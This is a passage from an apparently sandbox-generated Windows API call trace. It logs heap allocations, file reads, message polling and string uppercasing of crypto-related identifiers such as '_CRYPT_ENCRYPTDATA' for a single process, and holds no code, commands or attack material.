lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x2317, lpOverlapped=0x0) returned 1 [0225.790] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0225.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x3bf0dd8 [0225.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x3bf30f8 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x3bf0dd8 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0225.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0225.795] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x3bf0dd8 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fc8 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55048 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x3bf5418 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0225.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0225.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.799] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0225.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.799] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0225.800] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0225.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0225.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0225.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0225.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0225.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0225.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 